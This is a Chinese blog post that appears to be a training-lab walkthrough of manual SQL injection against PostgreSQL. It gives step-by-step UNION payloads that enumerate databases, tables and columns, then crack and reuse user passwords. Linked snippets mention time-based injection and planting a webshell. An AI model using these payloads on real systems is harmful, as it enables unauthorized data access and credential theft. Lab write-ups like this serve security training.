PostGREsql手工注入

于 2024-08-20 19:15:38 发布
阅读量110 收藏 1
点赞数 3
文章标签: oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73771249/article/details/141366030
版权

1、判断注入点

and 1=2报错,and1=1页面正常,存在sql注入

 

2、判断字段

order by 4,页面正常,order by 5,页面出错,所以只有4个字段

 

3、检测四个字段那个可以显示

and 1=2 union select 'null',null,null,null      无显示

and 1=2 union select null,'null',null,null      有显示

and 1=2 union select null,null,'null',null       有显示

and 1=2 union select null,null,null,'null'      无显示

4、在这两个字段当中来查询当前数据库名称和当前用户

and 1=2 union select null,null,string_agg(datname,','),nu ll from pg_database

and 1=2 union select null,null,string_agg(tablename,','), null from pg_tables where schemaname='public'

5、查询字段

and 1=2 union select null,null,string_agg(column_nam e,','),null from information_schema.columns where table_name='reg_users'

 

6、查出全部内容

7、解密得到相应密码,登录并提交FLAG

清星QA
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
PostGreSQL注入学习.doc
07-18
PostGreSQL注入学习
PostgreSQL手工注入实战-mozhe
m0_63917373的博客
10-02 409
墨者 PostgreSQL手工注入实战
PostgreSQL数据库注入-墨者学院(SQL手工注入漏洞测试(PostgreSQL数据库))
T1ngSh0w的博客
09-06 1507
PostgreSQL数据库注入-墨者学院-SQL手工注入漏洞测试(PostgreSQL数据库)
SQL手工注入漏洞测试(PostgreSQL数据库)-墨者
weoptions的博客
12-04 995
———靶场专栏———记录我的打靶过程
SQL注入漏洞(postgresql注入
errorr0
07-08 7805
postgresql sql注入
postgresql的简单手工注入
qq_42042353的博客
10-09 669
日常判断注入点 ’ and 1=1 and 1=2 通过一些函数来获取数据库的基本信息 and 1=cast(version() as int) 获取数据库版本信息 系统信息 and 1=cast(user||123 as int) 获取当前用户名称 创建表 ;create table xxx(w text not null); 向表中插入一句话木马 ;insert into xxx valu...
一个postgresql延时注入的tips
一个码农的笔记
03-20 3213
postgresql支持堆叠查询,所以可以加入分号之后执行下一条语句,所以在注入的时候可以用 select * from a where b='注入点';;select pg_sleep(10);-- 这样会有10秒的延迟,可以利用这点去盲注PostgreSQL...
oraclepostgresql 注入
hellodaoyan的博客
12-14 38
•id=111•。
WEB渗透SQL注入(常见数据库手工注入方法)!
m0_63160363的博客
12-22 981
union select 1,column_name,3,4...from information_schema.columns where table_name = 表名;Oracle:and 1=2 union select '1','2'...from dual(虚表)
SQL手工注入基础详解---- postgresql
热门推荐
xabc3000的专栏
05-30 1万+
来源:邪恶八进制信息安全团队 文章作者:x2bug 一般注入多用于在mssql和mysql两类数据库中,如mssql+asp、mysql+php则是最为常见的搭配环境。不同的网站应用的数据库也大不一样,根据数据库的处理能力、负载等多重因素决定。诸如mssql与mysql各类注入问题在网上已是随处可见,本文主要述说下关于少见的一类数据库注入PostgreSQL。 关于PostgreSQL
postgresql安装包
10-07
PostgreSQL是一种开源的对象关系型数据库管理系统(ORDBMS),它以其强大的功能、高度的稳定性、良好的社区支持和丰富的数据类型而受到全球开发者的青睐。在本文中,我们将深入探讨PostgreSQL的安装过程,以及如何...
Postgresql-10安装包
05-18
**PostgreSQL 10 安装指南** PostgreSQL 是一款强大的开源关系型数据库管理系统,具有高度的稳定性和可扩展性,被广泛应用于各种规模的企业和项目。本文将详细介绍如何使用提供的 PostgreSQL-10 安装包进行安装,...
PostgreSQL 14.1 中文手册
03-10
PostgreSQL 14.1 手册 PostgreSQL 全球开发组 翻译:彭煜玮1,PostgreSQL中文社区2文档翻译组
oracle的dataguard physical standby转 snapshot standby操作文档
最新发布
文牧之的博客
08-19 465
并查看备库alert日志,要有in transit 字样。
【MySQL】索引特性
qq_74276498的博客
08-14 1240
索引的作用就是提高查询速度,MySQL的存储方式,MySQL内部自己维护了一块buffer pool,并且与系统进行数据交换的单位是page。索引的实现是使用B+树数据结构来维护的,节点中包含了页目录。索引的操作,有主键索引,唯一键索引,普通索引,全文索引,查看索引命令,索引创建原则。
浅谈SQL Server、Oracle和MySQL
a876106354的博客
08-15 776
SQL Server 是Microsoft公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点,可跨越从运行MicrosoftWindows 98的膝上型电脑到运行2012 的大型多处理器的服务器等多种平台使用。Microsoft SQL Server 是一个全面的数据库平台,使用集成的商业智能(BI)工具提供了企业级的数据管理。数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,使您可以构建和管理用于业务的高可用和高性能的数据应用程序。MySQL是一个。
【案例46】Oracle更换数据库密码后产生Library Cache Lock导致系统卡死
Z.Virgil的博客
08-19 445
经过沟通,中午修改过数据库的密码。经过排查发现此IP为文件服务器,文件服务器是一个独立的ncchome,怀疑是文件服务器的数据源密码没有修改。但是对于正常的系统,由于口令的更改,可能存在某些被遗漏的客户端,不断重复尝试,从而引起数据库内部长时间的 Library Cache Lock的等待,这种情形非常常见。这个特性的作用是,如果用户输入了错误的密码尝试登录,那么随着登录错误次数的增加,每次登录前验证的时间也会增加,以此减缓可能对于数据库重复的口令尝试攻击。重新启动了监听,发现过一段时间,又变的很卡。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值